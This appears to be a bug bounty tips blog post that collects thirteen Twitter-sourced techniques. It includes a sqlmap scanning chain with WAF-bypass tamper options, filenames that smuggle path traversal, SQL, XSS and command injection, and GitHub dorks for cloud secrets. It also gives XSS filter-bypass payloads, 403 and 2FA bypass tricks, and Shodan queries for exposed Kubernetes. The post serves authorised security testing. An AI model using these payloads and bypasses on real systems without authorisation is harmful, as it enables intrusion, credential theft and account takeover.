This is another dose of bug bounty tips from the bug hunting community on Twitter, sharing their knowledge for all of us to help us find more vulnerabilities and collect bug bounties.
This is the 8th part and in each part we are publishing 10 or more tips. Let’s start!
- 1. Intercepting traffic on iOS13 in Burp Suite
- 2. Find SQL injections (command combo)
- 3. Get scope of Bugcrowd programs in CLI
- 4. GraphQL notes for beginners
- 5. Chaining file uploads with other vulns
- 6. GitHub dorks for AWS, Jira, Okta .. secrets
- 7. Simple reflected XSS scenario
- 8. Database of 500 Favicon hashes (FavFreak)
- 9. XSS firewall bypass techniques
- 10. List of 12 Android security testing tools
- 11. Tips on bypassing 403 and 401 errors
- 12. Find Kubernetes with Shodan
- 13. Multi-factor (2FA) authentication bypass
- Conclusion
1. Intercepting traffic on iOS13 in Burp Suite
By @Dark_Knight
Source: link
If you are having issues intercepting traffic on iOS13 with Burp Suite, try disabling TLSv1.3. You can do that by either one of these methods:
- Use the following command line option:
-Djdk.tls.server.protocols=TLSv1,TLSv1.1,TLSv1.2
- Or on version 2020.8 and above use the following config:
Now there should be no problem intercepting the traffic.
2. Find SQL injections (command combo)
By @El3ctr0Byt3s
Source: link
These 5 commands can help to easily identify SQL injection on our target domain:
subfinder -d target.com | tee -a domains
cat domains | httpx | tee -a urls.alive
cat urls.alive | waybackurls | tee -a urls.check
gf sqli urls.check >> urls.sqli
sqlmap -m urls.sqli --dbs --batch
Here’s what’s going on in detail:
- First we will find all subdomains under our target domain
- Next we will identify all alive web servers running on those subdomains
- Waybackurls will fetch all URLs that the Wayback Machine knows about the identified alive subdomains
- Now we will filter out URLs that match patterns with potential SQL injection
- The final step is to run sqlmap on all identified potentially vulnerable URLs and let it do its magic
Protip: If you need to bypass WAF (Web Application Firewall) in the process, add the following options to sqlmap:
--level=5 --risk=3 -p 'item1' --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,ifnull2ifisnull,modsecurityversioned
Here’s where to get all the tools for this tip:
- https://github.com/projectdiscovery/subfinder
- https://github.com/tomnomnom/waybackurls
- https://github.com/projectdiscovery/httpx
- https://github.com/tomnomnom/gf
- https://github.com/1ndianl33t/Gf-Patterns (sqli patterns)
3. Get scope of Bugcrowd programs in CLI
There is a new tool in town called bcscope which can get you the scope of all bug bounty programs available on Bugcrowd platform, including the private ones.
All you have to do is to provide your Bugcrowd token like this:
bcscope -t <YOUR-TOKEN-HERE> -c 2 -p
Quite convenient and pretty useful!
Get the tool here:
4. GraphQL notes for beginners
By @sillydadddy
Source: link
Here’s a GraphQL introduction 101 for bug bounty hunters compiled by @sillydadddy. This information can help you get up to speed and to get familiar with the GraphQL technology quickly. Here we go:
- GraphQL is used by developers for more usability than REST. So mostly it is implemented over existing REST services like a wrapper. So sometimes developers may not configure it properly for ALL endpoints!
- Most important thing for attacking GraphQL is to get the schema. For that we need to use introspection queries (it may be disabled). There are two versions of introspection queries. So don’t think the query is disabled if it’s not working – try both!
- Check whether you can get hold of GraphQL consoles used by the developers, e.g.:
/graphql
/altair
/playground
etc. etc. (use a wordlist) - Try adding debugging parameter to your requests:
&debug=1
- Look for previous versions, e.g.:
v1/graphql
V2/graphql
etc. - Tools:
- Altair web browser plugin to run your tests
- Graphql-Voyager for visual representation of schema
- GraphQl raider Burp Suite plugin extension
- Vulnerabilities:
- IDOR (Insecure direct object references)
- Authorization / Access control issues
- Insecure mutations (data modifications) in GraphQL
- Injections e.g.: SQL
Very useful GraphQL 101 indeed!
5. Chaining file uploads with other vulns
By @manas_hunter
Source: link
When testing file upload functionalities in a web application, try setting the filename to the following values:
../../../tmp/lol.png
—> for path traversalsleep(10)-- -.jpg
—> for SQL injection<svg onload=alert(document.domain)>.jpg/png
—> for XSS; sleep 10;
—> for command injections
With these payloads, we may trigger additional vulnerabilities.
6. GitHub dorks for AWS, Jira, Okta .. secrets
By @hunter0x7, @GodfatherOrwa
Source: link1, link2
Here are some useful GitHub dorks shared by @hunter0x7 for identifying sensitive information related to Amazon AWS cloud:
org:Target "bucket_name"
org:Target "aws_access_key"
org:Target "aws_secret_key"
org:Target "S3_BUCKET"
org:Target "S3_ACCESS_KEY_ID"
org:Target "S3_SECRET_ACCESS_KEY"
org:Target "S3_ENDPOINT"
org:Target "AWS_ACCESS_KEY_ID"
org:Target "list_aws_accounts"
Here’s another list of GitHub dorks shared by @GodfatherOrwa for identifying various other credentials and secrets:
"target.com" password or secret
"target.atlassian" password
"target.okta" password
"corp.target" password
"jira.target" password
"target.onelogin" password
target.service-now password
some time only "target"
Protip: While you are doing GitHub dorking, try also GitDorker (made by @obheda12) which automates the whole process and which contains 400+ dorks in total, for easy bug bounty wins.
Detailed information about GitDorker can be found here.
Also check related tip BBT5-8.
7. Simple reflected XSS scenario
By @_justYnot
Source: link
Here’s an interesting bug bounty write-up leading to a reflected XSS (Cross-Site Scripting by visiting a link).
The author was able to successfully identify and exploit XSS despite the fact that the application was filtering some characters and keywords (possibly protected by WAF).
Here’s what @_justYnot did in detail:
- Run
subfinder -d target.com | httprobe -c 100 > target.txt
- Run
cat target.txt | waybackurls | gf xss | kxss
- Got a URL which had all the special characters unfiltered and the parameter was
callback=
- Tried some basic XSS payloads but they weren’t working, the site was filtering some keywords in the payload (like script and alert)
- Then he referred to the @PortSwigger XSS cheat sheet (link)
- After trying some payloads, one payload with event as onbegin worked and XSS executed successfully!
- Made a good report, sent it to the company last month and got rewarded $$
This is a perfect example why we should never give up when things get difficult. When you’ve got a lead, you have to keep pushing to get the reward!
Here’s list of tools @_justYnot used:
- https://github.com/projectdiscovery/subfinder
- https://github.com/tomnomnom/httprobe
- https://github.com/tomnomnom/waybackurls
- https://github.com/tomnomnom/gf
- https://github.com/1ndianl33t/Gf-Patterns (xss pattern)
- https://github.com/tomnomnom/hacks/tree/master/kxss
8. Database of 500 Favicon hashes (FavFreak)
By @0xAsm0d3us
Source: link
There is a very cool new project called FavFreak which contains around 500 Favicon hashes.
This can be extremely useful during bug bounties, OSINT, fingerprinting etc. as it allows you to easily identify what kind of software is deployed on a particular URL.
The tool allows you to fetch Favicons from a list of URLs and sort them based on their Favicon hash. The usage is very straightforward:
cat urls.txt | python3 favfreak.py -o output
As a result, you will see:
- Which Favicon hash is on which URL
- Identified software based on the Favicon hash
- Summary and statistics
FavFreak can identify pretty much any contemporary software that is widely used nowadays. You can also easily add additional fingerprints.
Get FavFreak from here:
9. XSS firewall bypass techniques
Here’s a list of 7 useful techniques on how we can bypass WAF (Web Application Firewall) while exploiting XSS (Cross-Site Scripting) in a web application:
- Check if the firewall is blocking only lowercase:
<sCRipT>alert(1)</sCRiPt>
- Try to break firewall regex with new line (\r\n), aka. CRLF injection:
<script>%0d%0aalert(1)</script>
- Try double encoding:
%2522
- Testing for recursive filters, if firewall removes the text in bold, we will have clear payload:
<scr<script>ipt>alert(1);</scr</script>ipt>
- Injecting anchor tag without whitespaces:
<a/href="j	a	v	asc	ri	pt:alert(1)">
- Try to bypass whitespaces using a bullet:
<svg•onload=alert(1)>
- Try to change request method (POST instead of GET):
GET /?q=xss
POST /
q=xss
Protip: Check also previously published tip on WAF bypass BBT7-5.
10. List of 12 Android security testing tools
This is a compilation of some of the best Android security testing tools available today:
- Dex2JAR - Set of tools to work with Android Dex and Java CLASS files
- ByteCodeView - Java & Android APK reverse engineering suite (decompiler, editor, debugger & more)
- JADX - Dex to Java decompiler tools for producing Java source code from Android Dex and APK files
- JD-GUI - A standalone graphical utility that displays Java sources from CLASS files
- Drozer - A comprehensive security testing framework for Android
- Baksmali - An assembler/disassembler for the Dex format used by Dalvik (Android's Java)
- AndroGuard - A swiss army knife for analyzing, decompilation and reversing of Android apps
- ApkTool - Another swiss army knife tool for reverse engineering Android apps
- QARK - Tool to look for several security related Android application vulnerabilities
- AndroBugs - Another analysis tool for identifying security vulnerabilities in Android applications
- AppMon - An automated framework for monitoring and tampering system API calls of native macOS, iOS and Android apps
- MobSF - An all-in-one automated mobile security framework supporting Android, iOS and Windows mobile apps
Truly a remarkable list of tools, not just for reversing of Android apps!
Some of them excel in static analysis, some are for dynamic analysis, some of them tackle both, but all of them are open-source and free to use!
11. Tips on bypassing 403 and 401 errors
By @RathiArpeet
Source: link
Here's a list of tips on how to bypass 403 Forbidden and 401 Unauthorized errors:
1. By adding headers: X-Originating-IP, X-Remote-IP, X-Client-IP, X-Forwarded-For etc. Sometimes companies whitelist the IP for those who can access sensitive data. These headers take IP address as a value and let you access the resource if the supplied IP matches with their whitelisted ones.
2. With unicode chars: Try inserting unicode characters to bypass the defenses. Try e.g. ℀ = ca, ℁ = sa and many other (check here or here). So if /cadmin is blocked, try accessing ℀dmin. Check this short youtube video on unicode hacking tricks for more details.
3. By overriding, overwriting URL with headers: If GET /admin
gives you 403 Forbidden
, try to GET /accessible
(any accessible endpoint) and add any of these HTTP headers:
X-Original-URL: /admin
X-Override-URL: /admin
X-Rewrite-URL: /admin
4. Try different payloads: If GET /admin
gives you 403 Forbidden
, try accessing:
/accessible/..;/admin
/.;/admin
/admin;/
/admin/~
/./admin/./
/admin?param
/%2e/admin
/admin#
5. Method switching: Change the method from GET to POST, and see if you get something..
6. Via IP, Vhost: Access the site via its IP or Vhost to get the forbidden content.
7. Fuzzing: By bruteforcing (fuzzing) files or directories further..
Protip: Check also previously published tips related to this: BBT6-6, BBT4-5 and BBT4-6.
12. Find Kubernetes with Shodan
Here are 2 easy ways how to identify Kubernetes in your target organization using Shodan CLI and httpx:
1. Look for product "Kubernetes":
shodan search org:"target" product:"Kubernetes" | awk '{print $3 ":" $2}' | httpx -path /pods -content-length -status-code -title
2. Look for port "10250":
shodan search org:"target" port:"10250" | awk '{print $3 ":" $2}' | httpx -path /pods -content-length -status-code -title
Quite handy!
Make sure to have installed the following tools:
13. Multi-factor (2FA) authentication bypass
Here's an interesting tip to bypass 2FA in a web application or a mobile application.
1.Always notice both HTTP requests while logging in - when 2FA is enabled and disabled.
2. While 2FA is disabled:
- Request:
{"email":"[email protected]","password":"abc@123","mfa":null,"code":""}
- Response:
Location: https://vulnerable-site.com/user/dashboard
3. While 2FA is enabled:
- Request:
{"email":"[email protected]","password":"abc@123","mfa":true,"code":""}
- Response:
Location: https://vulnerable-site.com/v1/proxy/authentication/authenticate
4. Now tamper with the parameters and change to "mfa":null,"code":""
- Response:
Location: https://vulnerable-site.com/user/dashboard
Easy and simple 2FA bypass!
Conclusion
That’s it for this part of the bug bounty tips.
Massive thanks to all the authors for sharing their tips:
- @Dark_Knight
- @El3ctr0Byt3s
- @sw33tLie
- @sillydadddy
- @manas_hunter
- @hunter0x7
- @GodfatherOrwa
- @_justYnot
- @0xAsm0d3us
- @sratarun
- @cry__pto
- @RathiArpeet
- @Alra3ees
- @N008x
Make sure to follow them on Twitter, they will help you stay on top of the bug bounty game!
SHARE THIS